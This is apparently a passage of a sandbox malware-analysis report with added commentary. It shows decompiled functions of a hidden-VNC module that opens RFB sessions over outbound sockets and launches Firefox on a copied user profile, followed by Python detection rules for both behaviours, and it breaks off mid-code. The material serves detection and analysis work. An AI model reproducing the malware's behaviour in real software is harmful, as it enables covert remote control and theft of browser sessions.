                                          • Opcode Fuzzy Hash: 7b2fa552339222a825177e9a5a635de3c053b6a4e2871eadb985d273e0797acb
                                          • Instruction Fuzzy Hash: F1019632200B4183EB308B65E5D4B6973A0FB4C364F948228CBA847A95EF38C9A8C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleFileNameA.KERNEL32(?,?,0000001B,00C6258A,?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C645C5
                                          • GetLastError.KERNEL32(?,?,0000001B,00C6258A,?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C64600
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorFileLastModuleName
                                          • String ID:
                                          • API String ID: 2776309574-0
                                          • Opcode ID: 50b49585d9c40428764c95c644c859d0c54c4bc467d27369983c26f490315a6b
                                          • Instruction ID: acd6fa02f93f5310842b02004a5925a8f14fc231ed1914be829b0fb4720c4622
                                          • Opcode Fuzzy Hash: 50b49585d9c40428764c95c644c859d0c54c4bc467d27369983c26f490315a6b
                                          • Instruction Fuzzy Hash: BB01D831304B9082EE39AB5ABAD436AB595BB46FD0F0C4435FF9947B05EE7ACD418780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$Append$Popup$CreateDestroyTrack
                                          • String ID: Command Prompt$Computer Management$Control Panel$Device Manager$Disk Management$Event Viewer$File Explorer$Logoff$Power Options$Programs and Features$Restart$Shutdown$System$Task Manager
                                          • API String ID: 761734086-3197270845
                                          • Opcode ID: d87a8b716d9bf3227b42885cfd3b6b59b85f573c63d3b2b15c88234e7f8892c2
                                          • Instruction ID: 6d87535c14294db01688e747de7bb5b06ea046a921d20c037b1f124ca4851555
                                          • Opcode Fuzzy Hash: d87a8b716d9bf3227b42885cfd3b6b59b85f573c63d3b2b15c88234e7f8892c2
                                          • Instruction Fuzzy Hash: AB51EC7561091492F715DF26E818F9A33F2FB89B51FD99532E90607E28CF388999CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E00C6B36C(void* __edx, void* __edi, void* __esi, long long __rcx, void* __r11, char _a8, char _a16, char _a24, char _a32) {
                                          				long _v86;
                                          				char _v88;
                                          				long _v92;
                                          				char _v104;
                                          				long _v108;
                                          				char _v112;
                                          				char _v116;
                                          				signed int _v120;
                                          				char _v128;
                                          				long _v132;
                                          				signed int _v136;
                                          				signed long long _v144;
                                          				long _v152;
                                          				void* __rbx;
                                          				void* __rdi;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				long _t83;
                                          				void* _t85;
                                          				void* _t87;
                                          				long _t97;
                                          				long _t98;
                                          				void* _t120;
                                          				void* _t121;
                                          				long _t122;
                                          				signed long long _t133;
                                          				void* _t135;
                                          				signed long long* _t158;
                                          				long long _t179;
                                          				signed long long _t185;
                                          				long long _t186;
                                          				void* _t187;
                                          				void* _t188;
                                          				signed long long _t194;
                                          				signed long long _t197;
                                          				void* _t198;
                                          				signed long long _t201;
                                          				long _t202;
                                          
                                          				_t198 = __r11;
                                          				_t121 = __esi;
                                          				_t120 = __edi;
                                          				_t187 = _t188;
                                          				_t186 = __rcx;
                                          				asm("lock inc dword [0x2a492]");
                                          				_t135 = __rcx + 0x40;
                                          				r15d = 0;
                                          				_t122 = r15d;
                                          				do {
                                          					_t133 =  &_v132;
                                          					_v144 = _t133;
                                          					_t197 =  &_a24;
                                          					r8d = 0x13;
                                          					_v152 = _t202;
                                          					_v132 = r15d;
                                          					_a24 = r15w;
                                          					E00C6B070(_t121, _t122, _t135, _t135,  *((intOrPtr*)(_t186 + 0x38)), _t186, _t187, _t197);
                                          					 *(_t186 + 0x50) = _t133;
                                          					if(_t133 != 0xffffffff) {
                                          						r8d = 0x10;
                                          						_t84 = memcpy(??, ??, ??);
                                          						__imp__#9();
                                          						_v86 = _t84;
                                          						while(1) {
                                          							L4:
                                          							_t85 = E00C6C840(_t84, 0x493e0,  *(_t186 + 0x50));
                                          							r9d = 0;
                                          							_t16 = _t197 + 8; // 0x8
                                          							r8d = _t16;
                                          							__imp__#16();
                                          							if(_t85 != 8) {
                                          								break;
                                          							}
                                          							if(_v112 != 0xa) {
                                          								L35:
                                          								__imp__#22();
                                          								__imp__#3();
                                          								_t76 = _t186 + 0x50;
                                          								 *_t76 =  *(_t186 + 0x50) | 0xffffffff;
                                          								__eflags =  *_t76;
                                          								_t135 = _t186 + 0x40;
                                          								goto L36;
                                          							}
                                          							_t87 = E00C6AFD0(_t85, _t133, _t135,  &_v88,  &_v112);
                                          							_t201 = _t133;
                                          							if(_t133 == 0xffffffff) {
                                          								goto L35;
                                          							}
                                          							E00C6C840(_t87, 0x927c0, _t133);
                                          							r8d = 0x42d8;
                                          							_v128 = _v132;
                                          							_t98 = 8;
                                          							_t84 = HeapAlloc(??, ??, ??);
                                          							_t185 = _t133;
                                          							if(_t133 == 0) {
                                          								L32:
                                          								__imp__#3();
                                          								if(_t98 != 0) {
                                          									__imp__#3();
                                          								}
                                          								continue;
                                          							}
                                          							r8d = 0x42d8;
                                          							memset(??, ??, ??);
                                          							_t21 = _t185 + 0x38; // 0x38
                                          							_t202 = _t21;
                                          							 *(_t185 + 0x28) = _t201;
                                          							 *((long long*)(_t185 + 0x18)) = _t186;
                                          							 *(_t185 + 8) = _t185;
                                          							 *_t185 = _t185;
                                          							InitializeCriticalSection(??);
                                          							 *(_t185 + 0xa8) =  *(_t185 + 0xa8) | 0xffffffff;
                                          							_t28 = _t135 - 4; // 0x4
                                          							E00C6C894(_t28, _t133, _t135,  &_v128, _t185, _t186, _t185 + 0x41d6, _t198);
                                          							_t31 = _t135 - 4; // 0x4
                                          							E00C6C894(_t31, _t133, _t135,  &_v128, _t185, _t186, _t185 + 0x40d4, _t198);
                                          							r8d = GetCurrentThreadId();
                                          							OpenThread(??, ??, ??);
                                          							 *(_t185 + 0x20) = _t133;
                                          							if(_t133 == 0) {
                                          								_t98 = GetLastError();
                                          								L30:
                                          								if(_t98 == 0) {
                                          									r15d = 0;
                                          									__eflags = r15d;
                                          									continue;
                                          								}
                                          								DeleteCriticalSection();
                                          								_t84 = HeapFree(??, ??, ??);
                                          								r15d = 0;
                                          								goto L32;
                                          							}
                                          							EnterCriticalSection();
                                          							_t158 =  *(_t186 + 8);
                                          							 *(_t185 + 8) = _t158;
                                          							 *_t185 = _t186;
                                          							 *_t158 = _t185;
                                          							 *(_t186 + 8) = _t185;
                                          							LeaveCriticalSection(??);
                                          							_v136 = _v136 & 0x00000000;
                                          							_t202 =  *((intOrPtr*)(_t185 + 0x18));
                                          							r8d = 0xc;
                                          							if(E00C6BE28(_t121, _t135, _t185, "RFB 003.008\n", _t185, _t186) == 0xc) {
                                          								r8d = 0xc;
                                          								_t84 = E00C6BD0C(_t84, _t120, _t135, _t185,  &_v104, _t185, _t186, _t187);
                                          								_t98 = _t84;
                                          								__eflags = _t84;
                                          								if(_t84 != 0) {
                                          									L22:
                                          									__eflags = _t98 - 0xffffffff;
                                          									if(_t98 == 0xffffffff) {
                                          										_t98 = GetLastError();
                                          									}
                                          									L24:
                                          									r15d = 0;
                                          									__eflags = _t98;
                                          									if(_t98 != 0) {
                                          										L28:
                                          										EnterCriticalSection();
                                          										_t179 =  *(_t185 + 8);
                                          										_t194 =  *_t185;
                                          										 *_t179 = _t194;
                                          										 *((long long*)(_t194 + 8)) = _t179;
                                          										LeaveCriticalSection(??);
                                          										_t202 = _t185 + 0x38;
                                          										goto L30;
                                          									}
                                          									_t133 =  &_v116;
                                          									_t197 = _t185;
                                          									_v144 = _t133;
                                          									_v152 = r15d;
                                          									CreateThread(??, ??, ??, ??, ??, ??);
                                          									 *(_t185 + 0x20) = _t133;
                                          									__eflags = _t133;
                                          									if(_t133 == 0) {
                                          										_t84 = GetLastError();
                                          										_t98 = _t84;
                                          										__eflags = _t84;
                                          										if(_t84 == 0) {
                                          											continue;
                                          										}
                                          										goto L28;
                                          									}
                                          									_t84 = CloseHandle();
                                          									continue;
                                          								}
                                          								_v92 = _t84;
                                          								_t84 = lstrcmpiA(??, ??);
                                          								__eflags = _t84;
                                          								if(_t84 != 0) {
                                          									goto L10;
                                          								}
                                          								E00C6B2C8(_t84, _t135, _t185);
                                          								_t44 = _t135 + 2; // 0x2
                                          								r8d = _t44;
                                          								_a32 = 0x101;
                                          								_t84 = E00C6BE28(_t121, _t135, _t185,  &_a32, _t185, _t186);
                                          								__eflags = _t84 - 2;
                                          								if(_t84 != 2) {
                                          									goto L24;
                                          								}
                                          								_t47 = _t135 + 1; // 0x1
                                          								r8d = _t47;
                                          								_t84 = E00C6BD0C(_t84, _t120, _t135, _t185,  &_a8, _t185, _t186, _t187);
                                          								_t98 = _t84;
                                          								__eflags = _t84;
                                          								if(_t84 != 0) {
                                          									goto L22;
                                          								}
                                          								__eflags = _a8 - 1;
                                          								if(_a8 != 1) {
                                          									goto L10;
                                          								}
                                          								_v120 = _v120 & _t84;
                                          								_t52 = _t133 + 4; // 0x4
                                          								r8d = _t52;
                                          								_t84 = E00C6BE28(_t121, _t135, _t185,  &_v120, _t185, _t186);
                                          								__eflags = _t84 - 4;
                                          								if(_t84 != 4) {
                                          									goto L24;
                                          								} else {
                                          									goto L17;
                                          								}
                                          								while(1) {
                                          									L17:
                                          									Sleep();
                                          									__imp__#10();
                                          									__eflags = _t84;
                                          									if(_t84 != 0) {
                                          										break;
                                          									}
                                          									__eflags = _v136 - 1;
                                          									if(_v136 >= 1) {
                                          										break;
                                          									}
                                          									_t84 = WaitForSingleObject();
                                          									__eflags = _t84 - 0x102;
                                          									if(_t84 == 0x102) {
                                          										continue;
                                          									}
                                          									break;
                                          								}
                                          								_t133 = _v136;
                                          								__eflags = _t133 - 1;
                                          								if(_t133 < 1) {
                                          									goto L24;
                                          								}
                                          								r8d = 1;
                                          								_t97 = E00C6BD0C(_t84, _t120, _t135, _t185,  &_a16, _t185, _t186, _t187);
                                          								__eflags = _t97;
                                          								_t84 = 0x57;
                                          								_t98 =  !=  ? 0x57 : _t97;
                                          								goto L22;
                                          							}
                                          							L10:
                                          							_t98 = 0x57;
                                          							goto L28;
                                          						}
                                          						_v108 = _v132;
                                          						_v112 = 0xb;
                                          						_t84 = E00C6C840(_v132, 0x7530,  *(_t186 + 0x50));
                                          						r9d = 0;
                                          						_t73 = _t197 + 8; // 0x8
                                          						r8d = _t73;
                                          						__imp__#19();
                                          						__eflags = _t84 - 8;
                                          						if(_t84 == 8) {
                                          							goto L4;
                                          						}
                                          						goto L35;
                                          					}
                                          					L36:
                                          					__eflags = WaitForSingleObject() - 0x102;
                                          				} while (__eflags == 0);
                                          				_t83 = GetLastError();
                                          				 *(_t186 + 0x68) = _t83;
                                          				asm("lock dec dword [0x2a082]");
                                          				return _t83;
                                          			}

                                          APIs
                                            • Part of subcall function 00C6B070: socket.WS2_32 ref: 00C6B0BF
                                            • Part of subcall function 00C6B070: connect.WS2_32 ref: 00C6B0DE
                                            • Part of subcall function 00C6B070: setsockopt.WS2_32 ref: 00C6B10B
                                            • Part of subcall function 00C6B070: send.WS2_32 ref: 00C6B12E
                                            • Part of subcall function 00C6B070: recv.WS2_32 ref: 00C6B147
                                            • Part of subcall function 00C6B070: HeapFree.KERNEL32 ref: 00C6B1BA
                                          • memcpy.NTDLL ref: 00C6B3D9
                                          • htons.WS2_32 ref: 00C6B3E2
                                            • Part of subcall function 00C6C840: setsockopt.WS2_32 ref: 00C6C864
                                            • Part of subcall function 00C6C840: setsockopt.WS2_32 ref: 00C6C885
                                          • recv.WS2_32 ref: 00C6B40E
                                          • HeapAlloc.KERNEL32 ref: 00C6B464
                                          • memset.NTDLL ref: 00C6B481
                                          • InitializeCriticalSection.KERNEL32 ref: 00C6B49C
                                          • GetCurrentThreadId.KERNEL32 ref: 00C6B4CF
                                          • OpenThread.KERNEL32 ref: 00C6B4DF
                                          • EnterCriticalSection.KERNEL32 ref: 00C6B4FC
                                          • LeaveCriticalSection.KERNEL32 ref: 00C6B517
                                          • lstrcmpiA.KERNEL32 ref: 00C6B571
                                          • Sleep.KERNEL32 ref: 00C6B5E3
                                          • ioctlsocket.WS2_32 ref: 00C6B5F6
                                          • WaitForSingleObject.KERNEL32 ref: 00C6B610
                                          • GetLastError.KERNEL32 ref: 00C6B64A
                                          • CreateThread.KERNEL32 ref: 00C6B675
                                          • CloseHandle.KERNEL32 ref: 00C6B687
                                          • GetLastError.KERNEL32 ref: 00C6B692
                                          • EnterCriticalSection.KERNEL32 ref: 00C6B6A5
                                          • LeaveCriticalSection.KERNEL32 ref: 00C6B6BC
                                          • GetLastError.KERNEL32 ref: 00C6B6C8
                                          • DeleteCriticalSection.KERNEL32 ref: 00C6B6DB
                                          • HeapFree.KERNEL32 ref: 00C6B6ED
                                          • closesocket.WS2_32 ref: 00C6B6F9
                                          • closesocket.WS2_32 ref: 00C6B70A
                                            • Part of subcall function 00C6BD0C: recv.WS2_32 ref: 00C6BD3D
                                            • Part of subcall function 00C6BD0C: GetLastError.KERNEL32 ref: 00C6BD69
                                          • send.WS2_32 ref: 00C6B73F
                                          • shutdown.WS2_32 ref: 00C6B757
                                          • closesocket.WS2_32 ref: 00C6B761
                                            • Part of subcall function 00C6AFD0: socket.WS2_32 ref: 00C6AFE9
                                            • Part of subcall function 00C6AFD0: connect.WS2_32 ref: 00C6B004
                                            • Part of subcall function 00C6AFD0: setsockopt.WS2_32 ref: 00C6B02D
                                          • WaitForSingleObject.KERNEL32 ref: 00C6B779
                                          • GetLastError.KERNEL32 ref: 00C6B78A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$ErrorLast$setsockopt$HeapThreadclosesocketrecv$EnterFreeLeaveObjectSingleWaitconnectsendsocket$AllocCloseCreateCurrentDeleteHandleInitializeOpenSleephtonsioctlsocketlstrcmpimemcpymemsetshutdown
                                          • String ID: RFB 003.008
                                          • API String ID: 955141763-2137906931
                                          • Opcode ID: ca73c9375cd4023ea6abed7f81302fb6d3f948d599c2766709c08b95c2b797db
                                          • Instruction ID: d530e25caf81517afc0a2621bfdcec9ee67269ca2034486f9b76734cdbff65ce
                                          • Opcode Fuzzy Hash: ca73c9375cd4023ea6abed7f81302fb6d3f948d599c2766709c08b95c2b797db
                                          • Instruction Fuzzy Hash: C4B17132700B4186EB34DB76E9D47AD33A1FB44B94F908625DE5A87B54DF38C999C304
                                          Uniqueness

                                          Uniqueness Score: -1.00%
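The API list and string for this function (socket, connect, send, recv, setsockopt, ioctlsocket, and the literal "RFB 003.008") match the ProtocolVersion handshake that opens every VNC session (RFC 6143, section 7.1.1: a 12-byte "RFB xxx.yyy\n" banner, normally sent by the listening server first), which is what the "Contains VNC / remote desktop functionality (version string found)" and "Uses known network protocols on non-standard ports" signatures at the top of the report are keyed on. The block below is an added detection example, not part of the sandbox output: it parses that banner from the first payload of captured TCP streams and flags a handshake on a port outside 5900-5909, or one where the connecting side itself sends the server banner. The flows are constructed, and the reverse-connect heuristic is an assumption drawn from the connect()-then-send() order in the listing, not something the report states.

```python
"""Detect RFB (VNC) ProtocolVersion handshakes in captured TCP payloads.

Added example for this report, not part of the sandbox output. The sample flows are
constructed. The 'initiator_speaks_first' heuristic assumes that the listing's
connect()-then-send() order means the infected host plays the RFB server over an
outbound (reverse) connection; that is an inference, not a fact from the report.
"""
import re
from dataclasses import dataclass
from typing import Optional

# RFC 6143, 7.1.1: the ProtocolVersion message is exactly 12 bytes, "RFB xxx.yyy\n",
# with zero-padded three-digit major and minor numbers, e.g. "RFB 003.008\n".
RFB_VERSION_RE = re.compile(rb"\ARFB (\d{3})\.(\d{3})\n\Z")
STANDARD_VNC_PORTS = range(5900, 5910)   # where a legitimate VNC server normally listens


@dataclass(frozen=True)
class RfbHit:
    src: str
    dst: str
    dport: int
    version: tuple                 # (major, minor)
    nonstandard_port: bool         # known protocol on a non-standard port
    initiator_speaks_first: bool   # initiator sent the server-side banner: reverse VNC


def parse_rfb_version(payload: bytes) -> Optional[tuple]:
    """Return (major, minor) if the first 12 bytes are a well-formed banner, else None."""
    m = RFB_VERSION_RE.match(payload[:12])
    if m is None:
        return None
    return (int(m.group(1)), int(m.group(2)))


def scan_flows(flows):
    """flows: dicts with src, dst, dport, first_payload, first_payload_from_initiator."""
    hits = []
    for f in flows:
        ver = parse_rfb_version(f["first_payload"])
        if ver is None:
            continue
        hits.append(RfbHit(
            src=f["src"], dst=f["dst"], dport=f["dport"], version=ver,
            nonstandard_port=f["dport"] not in STANDARD_VNC_PORTS,
            initiator_speaks_first=f["first_payload_from_initiator"],
        ))
    return hits


# Constructed sample flows (not from the sandbox pcap): first payload bytes of each stream.
SAMPLE_FLOWS = [
    # outbound to 443, and the connecting host sends the RFB *server* banner itself
    {"src": "10.0.0.5", "dst": "198.51.100.7", "dport": 443,
     "first_payload": b"RFB 003.008\n", "first_payload_from_initiator": True},
    # ordinary VNC: the listening server speaks first on 5900
    {"src": "10.0.0.5", "dst": "198.51.100.8", "dport": 5900,
     "first_payload": b"RFB 003.003\n", "first_payload_from_initiator": False},
    # TLS ClientHello, not RFB
    {"src": "10.0.0.5", "dst": "198.51.100.9", "dport": 443,
     "first_payload": b"\x16\x03\x01\x00\xc8\x01\x00\x00", "first_payload_from_initiator": True},
    # malformed: the version fields must be zero-padded to three digits
    {"src": "10.0.0.5", "dst": "198.51.100.10", "dport": 8080,
     "first_payload": b"RFB 3.8\n", "first_payload_from_initiator": True},
]


def suspicious_hits(flows=SAMPLE_FLOWS):
    """RFB handshakes on a non-standard port, or where the initiator plays server."""
    return [h for h in scan_flows(flows) if h.nonstandard_port or h.initiator_speaks_first]


if __name__ == "__main__":
    for h in suspicious_hits():
        print(f"{h.src} -> {h.dst}:{h.dport} RFB {h.version[0]}.{h.version[1]} "
              f"nonstandard_port={h.nonstandard_port} reverse={h.initiator_speaks_first}")
```

Matching on the exact 12-byte shape rather than on the substring "RFB" keeps the rule from firing on unrelated traffic that merely contains those letters, and the port check alone is not enough: a plain VNC session on 5900 is only noteworthy when it is not expected on that host.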

                                          C-Code - Quality: 22%
                                          			E00C766A4(void* __ebx, void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long* __r8, char _a32) {
                                          				void* _v40;
                                          				char _v360;
                                          				void* __rdi;
                                          				void* _t40;
                                          				int _t47;
                                          				void* _t61;
                                          				long _t70;
                                          				long long _t77;
                                          				void* _t125;
                                          				long long _t127;
                                          				long long _t129;
                                          				long long _t131;
                                          				long long* _t134;
                                          				char* _t146;
                                          				long long _t149;
                                          				long long* _t152;
                                          				long long _t154;
                                          				long long _t157;
                                          
                                          				_t134 = __r8;
                                          				_t129 = __rbp;
                                          				_t127 = __rsi;
                                          				_t78 = __rbx;
                                          				_t77 = _t131;
                                          				 *((long long*)(_t77 + 8)) = __rbx;
                                          				 *((long long*)(_t77 + 0x10)) = __rbp;
                                          				 *((long long*)(_t77 + 0x18)) = __rsi;
                                          				_push(_t154);
                                          				 *(_t77 + 0x20) =  *(_t77 + 0x20) & 0;
                                          				_t152 = __r8;
                                          				_t125 = __rcx;
                                          				r14d = 0;
                                          				E00C7A500(__rbx, __rcx, L"FF", __rcx, __rsi);
                                          				_t149 = _t77;
                                          				if(_t77 != 0) {
                                          					lstrcpyA();
                                          					lstrcatA(??, ??);
                                          					lstrcatA(??, ??);
                                          					r8d = 0;
                                          					_t146 =  &_v360;
                                          					_t11 = _t134 + 1; // 0x1
                                          					_t61 = _t11;
                                          					CreateEventA(??, ??, ??, ??);
                                          					_t157 = _t77;
                                          					if(_t77 == 0) {
                                          						L22:
                                          						_t70 = 0x5b4;
                                          						L23:
                                          						HeapFree();
                                          						if(_t127 != 0) {
                                          							HeapFree();
                                          						}
                                          						goto L25;
                                          					}
                                          					if(GetLastError() == 0xb7) {
                                          						_t61 = 0x927c0;
                                          						if(WaitForSingleObject(??, ??) != 0) {
                                          							CloseHandle();
                                          							r15d = 0;
                                          						}
                                          					}
                                          					if(_t157 == 0) {
                                          						goto L22;
                                          					}
                                          					if(E00C76C5C(_t77, _t78, _t125) != 0) {
                                          						_t70 = 0;
                                          						L17:
                                          						lstrlenW();
                                          						HeapAlloc(??, ??, ??);
                                          						_t154 = _t77;
                                          						if(_t77 != 0) {
                                          							lstrcpyW();
                                          							lstrcatW(??, ??);
                                          						} else {
                                          							_t15 = _t77 + 8; // 0x8
                                          							_t70 = _t15;
                                          						}
                                          						L20:
                                          						SetEvent();
                                          						CloseHandle(??);
                                          						if(_t129 != 0) {
                                          							HeapFree();
                                          						}
                                          						goto L23;
                                          					}
                                          					E00C7A42C(0, _t61, _t77, _t78, L"APPDATA", _t127, _t129, L"Mozilla\\Firefox");
                                          					_t127 = _t77;
                                          					if(_t77 != 0) {
                                          						_t120 =  &_a32;
                                          						_t40 = E00C76984(_t77, _t78, _t127,  &_a32, _t146);
                                          						_t129 = _t77;
                                          						if(_t77 == 0) {
                                          							goto L9;
                                          						}
                                          						E00C6A708(_t40, _t77);
                                          						if(_a32 == r14d) {
                                          							_t127 = _t129;
                                          							HeapFree(??, ??, ??);
                                          							L15:
                                          							E00C7A8A0(_t77, _t78, _t125, _t120);
                                          							_t70 = E00C7FAD4(0, _t77, _t77, L"firefox.exe", _t127, _t149, _t146);
                                          							E00C7A914(_t77, _t146);
                                          							goto L17;
                                          						}
                                          						_t47 = lstrlenW();
                                          						lstrlenW(??);
                                          						_t14 = _t77 + 2; // 0x2
                                          						r8d = _t14;
                                          						r8d = r8d + _t47;
                                          						HeapAlloc(??, ??, ??);
                                          						_t78 = _t77;
                                          						if(_t77 == 0) {
                                          							goto L9;
                                          						}
                                          						lstrcpyW();
                                          						lstrcatW(??, ??);
                                          						_t120 = _t129;
                                          						lstrcatW(??, ??);
                                          						_t127 = _t78;
                                          						HeapFree(??, ??, ??);
                                          						goto L15;
                                          					}
                                          					L9:
                                          					_t70 = GetLastError();
                                          					goto L20;
                                          				} else {
                                          					_t70 = GetLastError();
                                          					L25:
                                          					if(_t70 == 0) {
                                          						 *_t152 = _t154;
                                          					} else {
                                          						if(_t154 != 0) {
                                          							HeapFree();
                                          						}
                                          					}
                                          					return _t70;
                                          				}
                                          			}
                                          (per-line instruction address column collapsed; function E00C766A4 spans 0x00c766a4 to 0x00c76983, with 0x00000000 marking lines that were not executed)

                                          APIs
                                            • Part of subcall function 00C7A500: GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A52B
                                            • Part of subcall function 00C7A500: GetLastError.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A537
                                            • Part of subcall function 00C7A500: HeapFree.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A661
                                          • GetLastError.KERNEL32 ref: 00C766E7
                                          • lstrcpyA.KERNEL32 ref: 00C76700
                                          • lstrcatA.KERNEL32 ref: 00C76712
                                          • lstrcatA.KERNEL32 ref: 00C76728
                                          • CreateEventA.KERNEL32 ref: 00C7673C
                                          • GetLastError.KERNEL32 ref: 00C7674E
                                          • WaitForSingleObject.KERNEL32 ref: 00C76763
                                          • CloseHandle.KERNEL32 ref: 00C76770
                                          • GetLastError.KERNEL32 ref: 00C767B0
                                          • SetEvent.KERNEL32 ref: 00C768EA
                                          • CloseHandle.KERNEL32 ref: 00C768F3
                                          • HeapFree.KERNEL32 ref: 00C7690A
                                          • HeapFree.KERNEL32 ref: 00C76923
                                          • HeapFree.KERNEL32 ref: 00C7693A
                                          • HeapFree.KERNEL32 ref: 00C76955
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap$ErrorLast$CloseEventHandlelstrcat$CreateObjectPathSingleTempWaitlstrcpy
                                          • String ID: --no-remote -profile $APPDATA$Mozilla\Firefox$firefox.exe
                                          • API String ID: 3891805355-3662271188
                                          • Opcode ID: b4a7fc5ba81804e43d32e3c150d23b25397f9433d3b7802c7f1462a278bb22c0
                                          • Instruction ID: 2102a8f062af906d855db917f4ccdc4903da2a0fdba9d05b180527f667289b61
                                          • Opcode Fuzzy Hash: b4a7fc5ba81804e43d32e3c150d23b25397f9433d3b7802c7f1462a278bb22c0
                                          • Instruction Fuzzy Hash: E3716B65201F4182FE29DB62E858B6963A1BB89FD0F98C625CD1E17B25DF3CC64AC304
                                          Uniqueness

                                          Uniqueness Score: -1.00%
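The strings for E00C766A4 ("--no-remote -profile", "APPDATA", "Mozilla\Firefox", "firefox.exe") together with the GetTempPathW subcall indicate that the function assembles a firefox.exe command line that points -profile at a copy of the user's Firefox profile under the temp directory and starts it detached from any running instance (-no-remote), the usual way a hidden-desktop VNC module gets a browser with the victim's cookies and sessions. The following is an added detection example over process-creation events, not code from the report: it flags firefox.exe started with an explicit profile outside the normal %APPDATA%\Mozilla\Firefox\Profiles root, under a temp directory, combined with -no-remote, or from an unexpected parent. The events are constructed in a Sysmon Event ID 1 style, and the parent process name in the first one is a hypothetical placeholder; the exact profile path the sample uses is not visible in the listing, so the rule keys on the shape, not on a specific path.

```python
"""Flag firefox.exe launched with a detached, out-of-place profile.

Added example for this report, not part of the sandbox output. The events below are
constructed; "dropper.exe" is a hypothetical parent name, not the sample's. The rule
follows the strings "--no-remote -profile", "APPDATA", "Mozilla\\Firefox", "firefox.exe"
and the GetTempPathW subcall in the listing above; the precise path the sample builds
is not shown there and is not assumed here.
"""
import shlex
from pathlib import PureWindowsPath

# Where a user's real profiles live; anything else passed to -profile is worth a look.
NORMAL_PROFILE_ROOTS = ("\\appdata\\roaming\\mozilla\\firefox\\profiles\\",)
TEMP_MARKERS = ("\\temp\\", "\\tmp\\")
EXPECTED_PARENTS = {"explorer.exe", "firefox.exe"}


def parse_cmdline(cmdline: str):
    """Split a Windows command line, keeping backslashes and stripping surrounding quotes."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def profile_path(argv):
    """Value given to -profile / --profile (Firefox accepts one or two dashes and '=')."""
    for i, a in enumerate(argv):
        low = a.lower()
        if low in ("-profile", "--profile") and i + 1 < len(argv):
            return argv[i + 1]
        if low.startswith(("-profile=", "--profile=")):
            return a.split("=", 1)[1]
    return None


def evaluate(event):
    """Return the list of reasons the event is suspicious; an empty list means benign."""
    if PureWindowsPath(event["Image"]).name.lower() != "firefox.exe":
        return []
    argv = parse_cmdline(event["CommandLine"])
    lowered = [a.lower() for a in argv]
    reasons = []
    prof = profile_path(argv)
    if prof is not None:
        p = prof.lower()
        if not any(root in p for root in NORMAL_PROFILE_ROOTS):
            reasons.append(f"profile outside the user's Firefox profile root: {prof}")
        if any(marker in p for marker in TEMP_MARKERS):
            reasons.append("profile directory lives under a temp directory")
        if "-no-remote" in lowered or "--no-remote" in lowered:
            reasons.append("-no-remote with explicit -profile: detached browser instance")
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent process: {parent}")
    return reasons


def triage(events):
    """Map event index -> reasons, for flagged events only."""
    return {i: r for i, e in enumerate(events) if (r := evaluate(e))}


# Constructed events (Sysmon Event ID 1 style). Paths and parent names are illustrative.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe" --no-remote -profile '
                    r"C:\Users\victim\AppData\Local\Temp\ffcopy",
     "ParentImage": r"C:\Users\victim\Downloads\dropper.exe"},        # hypothetical parent
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},                        # normal launch
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe" -profile '
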